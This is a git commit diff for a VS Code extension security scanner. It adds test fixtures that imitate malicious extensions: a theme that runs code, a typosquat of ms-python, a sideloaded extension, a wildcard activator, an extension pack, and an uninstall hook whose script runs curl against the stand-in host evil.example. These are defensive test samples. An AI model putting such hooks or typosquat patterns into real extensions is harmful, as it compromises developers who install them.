feat(llm-security): add /security ide-scan — VS Code / JetBrains extension prescan (v6.3.0)

New standalone scanner (prefix IDE) discovers installed VS Code extensions across forks (Cursor, Windsurf, VSCodium, code-server, Insiders, Remote-SSH) and runs 7 IDE-specific threat checks: blocklist match (CRITICAL), theme-with-code, sideload (unsigned .vsix), dangerous uninstall hook (HIGH), wildcard activation, extension-pack expansion, typosquat (MEDIUM). Per-extension reuse of UNI/ENT/NET/TNT/MEM/SCR scanners with bounded concurrency. Offline-first; --online opt-in. JetBrains discovery stubbed for v1.1. 22 new tests (1296 total, was 1274). Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-04-17 16:23:35 +02:00 · 2026-04-17 16:23:35 +02:00 · 6252e55700
commit 6252e55700
parent 7bcf5fae9d
33 changed files with 1849 additions and 20 deletions
--- a/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/evil.theme-with-code-1.0.0/extension.js
+++ b/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/evil.theme-with-code-1.0.0/extension.js
@ -0,0 +1,3 @@
+// evil theme entry
+function activate(context) {}
+module.exports = { activate };
--- a/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/evil.theme-with-code-1.0.0/package.json
+++ b/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/evil.theme-with-code-1.0.0/package.json
@ -0,0 +1,14 @@
+{
+  "publisher": "evil",
+  "name": "theme-with-code",
+  "version": "1.0.0",
+  "displayName": "Evil Theme",
+  "description": "A theme that secretly runs code (Material Theme malware pattern)",
+  "engines": { "vscode": "^1.80.0" },
+  "main": "./extension.js",
+  "activationEvents": ["*"],
+  "categories": ["Themes"],
+  "contributes": {
+    "themes": [{ "label": "Evil Dark", "uiTheme": "vs-dark", "path": "./themes/evil.json" }]
+  }
+}
--- a/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/extensions.json
+++ b/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/extensions.json
@ -0,0 +1,38 @@
+[
+  {
+    "identifier": { "id": "evil.theme-with-code" },
+    "version": "1.0.0",
+    "relativeLocation": "evil.theme-with-code-1.0.0",
+    "metadata": { "source": "gallery", "publisherDisplayName": "Evil Labs", "isBuiltin": false }
+  },
+  {
+    "identifier": { "id": "ms-pythom.pythom" },
+    "version": "1.0.0",
+    "relativeLocation": "ms-pythom.pythom-1.0.0",
+    "metadata": { "source": "gallery", "publisherDisplayName": "ms-pythom", "isBuiltin": false }
+  },
+  {
+    "identifier": { "id": "sideloaded.extension" },
+    "version": "1.0.0",
+    "relativeLocation": "sideloaded.extension-1.0.0",
+    "metadata": { "source": "vsix", "publisherDisplayName": "Sideload", "isBuiltin": false }
+  },
+  {
+    "identifier": { "id": "wildcard.activator" },
+    "version": "1.0.0",
+    "relativeLocation": "wildcard.activator-1.0.0",
+    "metadata": { "source": "gallery", "publisherDisplayName": "Wildcard", "isBuiltin": false }
+  },
+  {
+    "identifier": { "id": "hook.uninstall" },
+    "version": "1.0.0",
+    "relativeLocation": "hook.uninstall-1.0.0",
+    "metadata": { "source": "gallery", "publisherDisplayName": "Hook", "isBuiltin": false }
+  },
+  {
+    "identifier": { "id": "pack.big" },
+    "version": "1.0.0",
+    "relativeLocation": "pack.big-1.0.0",
+    "metadata": { "source": "gallery", "publisherDisplayName": "Pack", "isBuiltin": false }
+  }
+]
--- a/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/hook.uninstall-1.0.0/extension.js
+++ b/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/hook.uninstall-1.0.0/extension.js
@ -0,0 +1,2 @@
+function activate(context) {}
+module.exports = { activate };
--- a/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/hook.uninstall-1.0.0/package.json
+++ b/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/hook.uninstall-1.0.0/package.json
@ -0,0 +1,13 @@
+{
+  "publisher": "hook",
+  "name": "uninstall",
+  "version": "1.0.0",
+  "displayName": "Uninstall Hook Danger",
+  "description": "Extension with dangerous vscode:uninstall hook",
+  "engines": { "vscode": "^1.80.0" },
+  "main": "./extension.js",
+  "categories": ["Other"],
+  "scripts": {
+    "vscode:uninstall": "node -e \"require('child_process').exec('curl http://evil.example/hook')\""
+  }
+}
--- a/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/ms-pythom.pythom-1.0.0/extension.js
+++ b/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/ms-pythom.pythom-1.0.0/extension.js
@ -0,0 +1,3 @@
+// typosquat of ms-python.python
+function activate(context) {}
+module.exports = { activate };
--- a/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/ms-pythom.pythom-1.0.0/package.json
+++ b/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/ms-pythom.pythom-1.0.0/package.json
@ -0,0 +1,10 @@
+{
+  "publisher": "ms-pythom",
+  "name": "pythom",
+  "version": "1.0.0",
+  "displayName": "Pythom Helper",
+  "description": "Totally legit Python thing",
+  "engines": { "vscode": "^1.80.0" },
+  "main": "./extension.js",
+  "categories": ["Programming Languages"]
+}
--- a/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/pack.big-1.0.0/package.json
+++ b/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/pack.big-1.0.0/package.json
@ -0,0 +1,15 @@
+{
+  "publisher": "pack",
+  "name": "big",
+  "version": "1.0.0",
+  "displayName": "Big Pack",
+  "description": "Installs several other extensions",
+  "engines": { "vscode": "^1.80.0" },
+  "categories": ["Extension Packs"],
+  "extensionPack": [
+    "alpha.one",
+    "beta.two",
+    "gamma.three",
+    "delta.four"
+  ]
+}
--- a/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/sideloaded.extension-1.0.0/extension.js
+++ b/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/sideloaded.extension-1.0.0/extension.js
@ -0,0 +1,2 @@
+function activate(context) {}
+module.exports = { activate };
--- a/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/sideloaded.extension-1.0.0/package.json
+++ b/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/sideloaded.extension-1.0.0/package.json
@ -0,0 +1,10 @@
+{
+  "publisher": "sideloaded",
+  "name": "extension",
+  "version": "1.0.0",
+  "displayName": "Sideloaded",
+  "description": "Extension installed from a .vsix file",
+  "engines": { "vscode": "^1.80.0" },
+  "main": "./extension.js",
+  "categories": ["Other"]
+}
--- a/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/wildcard.activator-1.0.0/extension.js
+++ b/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/wildcard.activator-1.0.0/extension.js
@ -0,0 +1,2 @@
+function activate(context) {}
+module.exports = { activate };
--- a/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/wildcard.activator-1.0.0/package.json
+++ b/plugins/llm-security/tests/fixtures/ide-extensions/root-mixed/wildcard.activator-1.0.0/package.json
@ -0,0 +1,11 @@
+{
+  "publisher": "wildcard",
+  "name": "activator",
+  "version": "1.0.0",
+  "displayName": "Wildcard Activator",
+  "description": "Broad activation surface (non-theme, untrusted)",
+  "engines": { "vscode": "^1.80.0" },
+  "main": "./extension.js",
+  "activationEvents": ["*"],
+  "categories": ["Other"]
+}